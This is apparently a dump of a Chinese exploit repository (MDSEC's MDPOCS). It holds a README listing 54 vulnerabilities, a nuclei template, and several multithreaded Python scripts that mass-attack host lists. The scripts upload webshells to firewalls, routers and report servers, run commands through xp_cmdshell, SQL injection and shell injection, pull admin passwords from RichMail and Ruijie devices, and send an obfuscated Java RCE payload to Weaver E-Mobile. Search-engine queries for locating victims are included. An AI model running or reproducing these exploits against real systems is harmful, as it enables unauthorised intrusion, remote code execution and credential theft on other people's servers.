10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 QAX_Sec3600_Firewall_UploadFile_Poc.py url.txt                                             +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | }  
31 | requests.packages.urllib3.disable_warnings()
32 | 
33 | def exp(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc",
43 |         "Host": "%s" %host2,
44 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
45 |         "Accept": "*/*",
46 |         "Accept-Encoding": "gzip, deflate"
47 |     }
48 |     vulurl = url + "/?g=obj_app_upfile"
49 |     data="""------WebKitFormBoundaryJpMyThWnAxbcBBQc
50 | Content-Disposition: form-data; name="MAX_FILE_SIZE"
51 | 
52 | 1000000000
53 | ------WebKitFormBoundaryJpMyThWnAxbcBBQc
54 | Content-Disposition: form-data; name="upfile"; filename="test111.php"
55 | Content-Type: image/jpeg
56 | 
57 | test111
58 | ------WebKitFormBoundaryJpMyThWnAxbcBBQc
59 | Content-Disposition: form-data; name="submit_post"
60 | 
61 | obj_app_upfile
62 | ------WebKitFormBoundaryJpMyThWnAxbcBBQc
63 | Content-Disposition: form-data; name="__hash__"
64 | 
65 | 0b9d6b1ab7479ab69d9f71b05e0e9445
66 | ------WebKitFormBoundaryJpMyThWnAxbcBBQc--"""
67 |     try:
68 |         r = requests.post(vulurl, data=data,headers=headers,verify=False,allow_redirects=False)
69 |         if r.status_code==302 and "test111" in str(r.content):
70 |             print(url+"/attachements/test111.php")     
71 |         else:
72 |             return 0
73 |             print (host+":false")
74 |     except:
75 |         return 0
76 |         print (host+":false")
77 | 
78 | 
79 | if __name__ == '__main__':
80 |     file = sys.argv[1]
81 |     data = open(file)
82 |     reader = csv.reader(data)
83 |     with ThreadPoolExecutor(50) as pool:
84 |         for row in reader:
85 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Qiwangzhizao_ERP_Comboxstore_Rce_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # title="企望制造ERP系统"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+---------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 Qiwangzhizao_ERP_Comboxstore_Rce_Poc.py url.txt                                             +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | } 
31 | def poc(host):
32 |     if "http" in host:
33 |         url = host
34 |     else:
35 |         url ="http://"+host
36 |     host1=url.replace("http://","")
37 |     host2=host1.replace("https://","")
38 |     headers = {
39 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
40 |         "Accept-Encoding": "gzip,deflate",
41 |         "Accept":"*/*",
42 |         "Connection":"close",
43 |         "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
44 |         "Content-Length":"40",
45 |         "Host":"%s" % host2
46 | 
47 |     }
48 |     vulurl = url + "/mainFunctions/comboxstore.action"
49 |     data="comboxsql=exec%20xp_cmdshell%20'whoami'"
50 |     try:
51 |         r = requests.post(vulurl, headers=headers,data=data)
52 |         #print(r.content)
53 |         if r.status_code==200 and "nt authority" in str(r.content) :
54 |             print(host+" :true ")
55 |         else:
56 |             return 0
57 |             print (host+":false")
58 |     except:
59 |         return 0
60 |         print (host+":false")
61 | 
62 | if __name__ == '__main__':
63 |     file = sys.argv[1]
64 |     data = open(file)
65 |     reader = csv.reader(data)
66 |     with ThreadPoolExecutor(50) as pool:
67 |         for row in reader:
68 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # MDPOCS
 2 | 
 3 | 猫蛋儿安全团队编写的poc,能报就能打。
 4 | 
 5 | 漏洞列表：
 6 | 
 7 | 1. Metabase 远程命令执行漏洞
 8 | 2. 海康威视 ResourceOperations任意文件上传
 9 | 3. Openfire权限绕过漏洞
10 | 4. 泛微E-Mobile 6.0-6.5 前台RCE
11 | 5. 金和 OA C6 GetSqlData.aspx SQL 注入漏洞导致RCE
12 | 6. 企业微信API信息泄漏漏洞
13 | 7. 蓝凌OA treexml.tmpl 远程命令执行漏洞
14 | 8. 蓝凌OA Custom.jsp任意文件读取漏洞
15 | 9. 畅捷通T+ GetStoreWarehouseByStore RCE漏洞
16 | 10. 金蝶云星空 Kingdee-erp-Unserialize-RCE漏洞
17 | 11. nginxWebUI 远程命令执行漏洞
18 | 12. 海康威视 Report 任意文件上传漏洞
19 | 13. 泛微E-Office Uploadify文件上传漏洞(CVE-2023-2648)
20 | 14. 泛微E-Office OfficeServer 文件上传漏洞
21 | 15. 宏景HCM codesettree SQL注入
22 | 16. 用友时空 KSOA QueryService SQL注入漏洞
23 | 17. HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
24 | 18. 绿盟 SAS 堡垒机 GetFile 任意文件读取漏洞  //复现有ip访问限制
25 | 19. 绿盟 SAS 堡垒机 local_user.php 任意用户登录漏洞
26 | 20. 绿盟 SAS 堡垒机 Exec 远程命令执行漏洞//复现有ip访问限制自行修改payload
27 | 21. PigCMS action_flashUpload 任意文件上传漏洞
28 | 22. 锐捷 NBR 路由器 fileupload.php 任意文件上传
29 | 23. 网神 SecGate 3600 防火墙任意文件上传漏洞
30 | 24. 企望制造ERP系统 comboxstore RCE漏洞
31 | 25. 任我行CRM TypeId SQL注入漏洞
32 | 26. 大华智慧园区综合管理平台getFaceCapture SQL注入漏洞
33 | 27. 广联达OA GetIMDictionary 前台sql注入
34 | 28. 广联达OA msgbroadcastuploadfile 后台文件上传
35 | 29. 红帆OA Ioffice Udfmr.asmx  SQL注入漏洞
36 | 30. VMware Aria Operations SSH硬编码 密钥爆破漏洞
37 | 31. 锐捷Smartweb管理系统EXCU_SHELL信息泄露漏洞
38 | 32. 用友GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
39 | 33. 视频监控汇聚平台EasyCVR用户信息泄漏漏洞
40 | 34. 金盘图书馆微信管理后台信息泄露漏洞
41 | 35. 宏景HCM KhFieldtree接口SQL注入
42 | 36. RichMail 企业邮箱敏感信息泄漏漏洞
43 | 37. F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)
44 | 38. XXL-JOB默认accessToken身份绕过 RCE
45 | 39. IP-guard Webserver view 远程命令执行漏洞
46 | 40. 用友 NC Cloud uploadChunk 任意文件上传漏洞
47 | 41. 金蝶云星空ScpSupRegHandler任意文件上传
48 | 42. ArrayVPN fshare_template 任意文件读取
49 | 43. 金蝶 Apusic 应用服务器任意文件上传
50 | 44. 速达软件全系产品存在任意文件上传漏洞
51 | 45. 海康威视IP网络对讲广播系统命令执行漏洞
52 | 46. 奥威亚视屏云平台任意文件下载漏洞
53 | 47. Apache Ofbiz XML-RPC RCE
54 | 48. 飞企互联-FE企业运营管理平台登录绕过漏洞
55 | 49. Likeshop userFormImage 任意文件上传
56 | 50. Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
57 | 51. YouDianCMS友点系统存在任意文件上传漏洞
58 | 52. 用友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞
59 | 53. 大华 EIMS captureCommand 远程命令执行漏洞
60 | 54. 用友NC Cloud importhttpscer接口存在任意文件上传漏洞
61 | 
62 | 公众号：猫蛋儿安全
63 | 
64 | ![1691885589911](image/README/1691885589911.png)
65 | 
66 | ![wx](image/README/猫蛋儿微信.jpeg)
67 | 


--------------------------------------------------------------------------------
/Renwoxing_CRM_Typeid_sql_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # "app="任我行CRM"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+-------------------------------------------------------------------------------------------------- -------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                       +')
23 |     print(
24 |         '+ EXP: python3 Renwoxing_CRM_Typeid_sql_Poc.py url.txt                                                  +')
25 |     print(
26 |         '+-------------------------------------------------------------------------------------------------- --------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | } 
31 | def poc(host):
32 |     if "http" in host:
33 |         url = host
34 |     else:
35 |         url ="http://"+host
36 |     host1=url.replace("http://","")
37 |     host2=host1.replace("https://","")
38 |     headers = {
39 |         "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Chrome/83.0.4103.116 Safari/537.36",
40 |         "Accept-Encoding":"gzip, deflate",
41 |         "Accept": "*/*",
42 |         "Connection":"close",
43 |         "Content-Type":"application/x-www-form-urlencoded",
44 |         "Content-Length":"89",
45 |         "Host":"%s" % host2
46 | 
47 |     }
48 |     vulurl = url + "/SMS/SmsDataList/?pageIndex=1&pageSize=30"
49 |     data="Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI"
50 |     try:
51 |         r = requests.post(vulurl, headers=headers,data=data)
52 |         # print(r.content)
53 |         
54 |         if r.status_code==200 and "0xe10adc3949ba59abbe56e057f20f883e" in str(r.content): 
55 |             print(host+" : true ")
56 |             #print(r.text)
57 |         else:
58 |             return 0
59 |     except:
60 |         return 0
61 | 
62 | 
63 | if __name__ == '__main__':
64 |     file = sys.argv[1]
65 |     data = open(file)
66 |     reader = csv.reader(data)
67 |     with ThreadPoolExecutor(50) as pool:
68 |         for row in reader:
69 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/RichMail_noCookiesMail_info_Leak_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa:"Richmail 企业邮箱"
 6 | 
 7 | 
 8 | 
 9 | import sys
10 | import requests
11 | import csv
12 | import urllib3
13 | import hashlib
14 | from concurrent.futures import ThreadPoolExecutor
15 | 
16 | if len(sys.argv) != 2:
17 |     print(
18 |         '+----------------------------------------------------------------------------------------------------------+')
19 |     print(
20 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
21 |     print(
22 |         '+----------------------------------------------------------------------------------------------------------+')
23 |     print(
24 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
25 |     print(
26 |         '+ EXP: python3 EasyCVR_Userlist_Leak_Poc.py url.txt                                               +')
27 |     print(
28 |         '+----------------------------------------------------------------------------------------------------------+')
29 |     sys.exit()
30 | proxysdata = {
31 | 'http': '127.0.0.1:8081'
32 | }  
33 | requests.packages.urllib3.disable_warnings()
34 | 
35 | def exp(host):
36 |     if "http" in host:
37 |         url = host
38 |     else:
39 |         url ="http://"+host
40 |     host1=url.replace("http://","")
41 |     host2=host1.replace("https://","")
42 |     headers = {
43 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
44 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
45 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
46 |         "Accept-Encoding": "gzip, deflate",
47 |         "X-Forward-For":"127.0.0.1",
48 |         "Host": "%s" % host2
49 |     }
50 |     vulurl = url + "/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin"
51 |     try:
52 |         r = requests.get(vulurl,headers=headers,verify=False)
53 |         
54 |         if r.status_code==200 and "S_OK" in r.text :
55 |             path = r.text.replace('\"',"").replace('{',"").replace('}',"").split('errorMsg')[1]
56 |             print(url+"账号:admin,密码: "+path[1:])
57 |            #print(url+r.text)
58 |             #print(r.text)     
59 |         else:
60 |             return 0
61 |             print (host+":false")
62 |     except:
63 |         return 0
64 |         print (host+":false")
65 | 
66 | if __name__ == '__main__':
67 |     file = sys.argv[1]
68 |     data = open(file)
69 |     reader = csv.reader(data)
70 |     with ThreadPoolExecutor(50) as pool:
71 |         for row in reader:
72 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Ruijie_NBR_FileUpload_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="Ruijie-NBR路由器" && icon_hash="-692947551"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 Ruijie_NBR_FileUpload_Poc.py url.txt                                                        +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8081'
30 | }  
31 | requests.packages.urllib3.disable_warnings()
32 | 
33 | def exp(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Content-Disposition": "form-data; name=\"file\"; filename=\"test.php\"",
43 |         "Host": "%s" %host2,
44 |         "Content-Type": "image/jpeg",
45 |         "Accept-Encoding": "gzip, deflate"
46 |     }
47 |     vulurl = url + "/ddi/server/fileupload.php?uploadDir=../../test&name=test.php"
48 |     data='test'
49 |     try:
50 |         r = requests.post(vulurl, data=data,headers=headers,verify=False,proxies=proxysdata)
51 |         #print(r.text)
52 |         if "test" in r.text :
53 |             print("shell地址为："+url+"/test/test.php")     
54 |         else:
55 |             return 0
56 |             print (host+":false")
57 |     except:
58 |         return 0
59 |         print (host+":false")
60 | 
61 | 
62 | if __name__ == '__main__':
63 |     file = sys.argv[1]
64 |     data = open(file)
65 |     reader = csv.reader(data)
66 |     with ThreadPoolExecutor(50) as pool:
67 |         for row in reader:
68 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Ruijie_SmartWeb_Execshell_Leak_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa:server="GoAheadWebs"//不准确
 6 | # hunter:body="img/free_login_ge.gif" && body="./img/login_bg.gif"
 7 | 
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | 
15 | if len(sys.argv) != 2:
16 |     print(
17 |         '+----------------------------------------------------------------------------------------------------------+')
18 |     print(
19 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
20 |     print(
21 |         '+----------------------------------------------------------------------------------------------------------+')
22 |     print(
23 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
24 |     print(
25 |         '+ EXP: python3 Ruijie_SmartWeb_Execshell_Leak_Poc.py url.txt                                               +')
26 |     print(
27 |         '+----------------------------------------------------------------------------------------------------------+')
28 |     sys.exit()
29 | proxysdata = {
30 | 'http': '127.0.0.1:8081'
31 | }  
32 | requests.packages.urllib3.disable_warnings()
33 | 
34 | def exp(host):
35 |     if "http" in host:
36 |         url = host
37 |     else:
38 |         url ="http://"+host
39 |     host1=url.replace("http://","")
40 |     host2=host1.replace("https://","")
41 |     headers = {
42 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
43 |         "Content-Disposition": "form-data; name=\"file\"; filename=\"test.php\"",
44 |         "Host": "%s" %host2,
45 |         "Cmdnum": "'1'",
46 |         "Command1": "show running-config",
47 |         "Confirm1": "n",
48 |         "Connection": "close",
49 |         "Accept-Encoding": "gzip, deflate"
50 |     }
51 |     vulurl = url + "/EXCU_SHELL"
52 |     data='test'
53 |     try:
54 |         r = requests.post(vulurl, data=data,headers=headers,verify=False)
55 |         #print(r.text)
56 |         if "Building configuration" in r.text :
57 |             b=r.text.find('password 0')
58 |             print(url+"    "+r.text[b-11:b+19])
59 |             #print(r.text)     
60 |         else:
61 |             return 0
62 |             print (host+":false")
63 |     except:
64 |         return 0
65 |         print (host+":false")
66 | 
67 | if __name__ == '__main__':
68 |     file = sys.argv[1]
69 |     data = open(file)
70 |     reader = csv.reader(data)
71 |     with ThreadPoolExecutor(50) as pool:
72 |         for row in reader:
73 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Sifudi_test_qrcode_b_Rce_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa: product="思福迪-LOGBASE"
 6 | # hunter: web.body="思福迪-LOGBASE"
 7 | # zoomeye: app:"思福迪运维安全管理系统"
 8 | 
 9 | import sys
10 | import requests
11 | import csv
12 | import urllib3
13 | import hashlib
14 | from concurrent.futures import ThreadPoolExecutor
15 | urllib3.disable_warnings()
16 | 
17 | if len(sys.argv) != 2:
18 |     print(
19 |         '+----------------------------------------------------------------------------------------------------------+')
20 |     print(
21 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
22 |     print(
23 |         '+---------------------------------------------------------------------------------------------------------+')
24 |     print(
25 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
26 |     print(
27 |         '+ EXP: python3 Qiwangzhizao_ERP_Comboxstore_Rce_Poc.py url.txt                                             +')
28 |     print(
29 |         '+----------------------------------------------------------------------------------------------------------+')
30 |     sys.exit()
31 | proxysdata = {
32 | 'http': '127.0.0.1:8080'
33 | } 
34 | def poc(host):
35 |     if "http" in host:
36 |         url = host
37 |     else:
38 |         url ="http://"+host
39 |     host1=url.replace("http://","")
40 |     host2=host1.replace("https://","")
41 |     headers = {
42 |         "User-Agent": "Go-http-client/1.1",
43 |         "Accept":"gzip",
44 |         "Referer":"%s" % host,
45 |         "Content-Type": "application/x-www-form-urlencoded",
46 |         "Host":"%s" % host2
47 |     }
48 |     vulurl = url + "/bhost/test_qrcode_b"
49 |     data='z1=1&z2="|id;"&z3=bhost'
50 |     try:
51 |         r = requests.post(vulurl, headers=headers,data=data,verify=False)
52 |         #print(r.status_code)
53 |         if r.status_code==200 and "uid" in r.text :
54 |             print(host+" :true ")
55 |         else:
56 |             return 0
57 |             print (host+":false")
58 |     except:
59 |         return 0
60 |         print (host+":false")
61 | 
62 | if __name__ == '__main__':
63 |     file = sys.argv[1]
64 |     data = open(file)
65 |     reader = csv.reader(data)
66 |     with ThreadPoolExecutor(50) as pool:
67 |         for row in reader:
68 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Suda_Report_FileUpload_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="速达软件-公司产品"
 6 | # zoomeye:速达软件 +port:"8083"
 7 | 
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | 
15 | if len(sys.argv) != 2:
16 |     print(
17 |         '+----------------------------------------------------------------------------------------------------------+')
18 |     print(
19 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
20 |     print(
21 |         '+----------------------------------------------------------------------------------------------------------+')
22 |     print(
23 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
24 |     print(
25 |         '+ EXP: python3 Ruijie_NBR_FileUpload_Poc.py url.txt                                                        +')
26 |     print(
27 |         '+----------------------------------------------------------------------------------------------------------+')
28 |     sys.exit()
29 | proxysdata = {
30 | 'http': '127.0.0.1:8081'
31 | }  
32 | requests.packages.urllib3.disable_warnings()
33 | 
34 | def exp(host):
35 |     if "http" in host:
36 |         url = host
37 |     else:
38 |         url ="http://"+host
39 |     host1=url.replace("http://","")
40 |     host2=host1.replace("https://","")
41 |     headers = {
42 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
43 |         "Host": "%s" %host2,
44 |         "Content-Type": "application/octet-stream",
45 |         "Accept-Encoding": "gzip, deflate"
46 |     }
47 |     vulurl = url + "/report/DesignReportSave.jsp?report=../test.jsp"
48 |     data='<% out.print("kkttxx");%>'
49 |     try:
50 |         r = requests.post(vulurl, data=data,headers=headers,verify=False)
51 |         r2 = requests.get(url+"/test.jsp")
52 |         if "kkttxx" in r2.text :
53 |             print("shell地址为："+url+"/test.jsp")     
54 |         else:
55 |             return 0
56 |             print (host+":false")
57 |     except:
58 |         return 0
59 |         print (host+":false")
60 | 
61 | 
62 | if __name__ == '__main__':
63 |     file = sys.argv[1]
64 |     data = open(file)
65 |     reader = csv.reader(data)
66 |     with ThreadPoolExecutor(50) as pool:
67 |         for row in reader:
68 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Video_cloud_pla_download.aspx-anyfile-CNVD-2022-91381.yaml:
--------------------------------------------------------------------------------
 1 | id: Video_cloud_pla_download_aspx-anyfile-CNVD-2022-91381
 2 | 
 3 | info:
 4 |   name: 奥威亚视屏云平台download.aspx任意文件下载漏洞
 5 |   author: MDSEC
 6 |   severity: high
 7 |   description: |
 8 |     广州市奥威亚电子科技有限公司是一家专注于教育信息化产品研发、生产、销售及服务的高新技术企业。广州市奥威亚电子科技有限公司校园视频应用云平台download.aspx存在任意文件下载漏洞，攻击者可利用该漏洞下载服务器上任意文件，获取敏感信息。
 9 |   reference:
10 |     - https://blog.csdn.net/qq_41490561
11 |     - https://www.cnvd.org.cn/flaw/show/CNVD-2022-91381
12 |   classification:
13 |     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
14 |     cvss-score: 7.0
15 |     cwe-id: CWE-200
16 |   metadata:
17 |     verified: true
18 |     samples: ""
19 |   tags: ava,download
20 | 
21 | http:
22 |   - raw:
23 |       - |
24 |         GET /download.aspx?file=/Tools/AS/ASRoute.aspx HTTP/1.1
25 |         Host: {{Hostname}}
26 |         sec-ch-ua-platform: "Windows"
27 |         Upgrade-Insecure-Requests: 1
28 |         sec-ch-ua-mobile: ?0
29 |         Accept-Language: zh-CN,zh;q=0.9
30 |         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
31 |         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
32 |         sec-ch-ua: "Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"
33 |         Accept-Encoding: gzip, deflate
34 | 
35 |     matchers:
36 |       - type: dsl
37 |         dsl:
38 |           - 'status_code==200 && contains(body,"MyAgentServerTestListAgentServer")'
39 |           - 'contains(body,"<%@")'
40 | 
41 | 
42 | # Enhanced by md on 2023/12/16


--------------------------------------------------------------------------------
/Weaver_E_Mobile_6_RCE_Exp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # icon_hash="1578525679"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import HackRequests
11 | from concurrent.futures import ThreadPoolExecutor
12 | raw='''------WebKitFormBoundaryTm8YXcJeyKDClbU7\r\nContent-Disposition: form-data; name="method"\r\n\r\ncreate\r\n------WebKitFormBoundaryTm8YXcJeyKDClbU7\r\nContent-Disposition: form-data; name="typeName"\r\n\r\n1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf(' whoami');--\r\n------WebKitFormBoundaryTm8YXcJeyKDClbU7--'''
13 | raw1='''------WebKitFormBoundaryTm8YXcJeyKDClbU7\r\nContent-Disposition: form-data; name="method"\r\n\r\ngetupload\r\n------WebKitFormBoundaryTm8YXcJeyKDClbU7\r\nContent-Disposition: form-data; name="uploadID"\r\n\r\n1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf(' whoami');--\r\n------WebKitFormBoundaryTm8YXcJeyKDClbU7--'''
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 Weaver_E_Mobile_6_RCE_Exp.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 |     
29 | def exp(host):
30 |     proxysdata = {
31 | 'http': '127.0.0.1:8080'
32 | }
33 |     url = "http://" + host
34 |     headers = {
35 |         "Host": "%s" % host,
36 |         'Accept-Encoding': '',
37 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
38 |         "Content-Type": "multipart/form-data;boundary=----WebKitFormBoundaryTm8YXcJeyKDClbU7"
39 |     }
40 |     vulurl1 = url + "/client.do"
41 |     vulurl2 = url + "/messageType.do"
42 |     try:
43 |         r1 =requests.post(vulurl1, headers=headers,data=str(raw1),timeout=15)
44 |         r2 =requests.post(vulurl2, headers=headers,data=str(raw),timeout=15)
45 |         if  "authority" in r1.text or "authority" in r2.text:
46 |             if  "system" in r1.text:
47 |                 print ("vulurl: "+vulurl1)
48 |             else :
49 |                 print ("vulurl: "+vulurl2)
50 |         else :
51 |             return 0
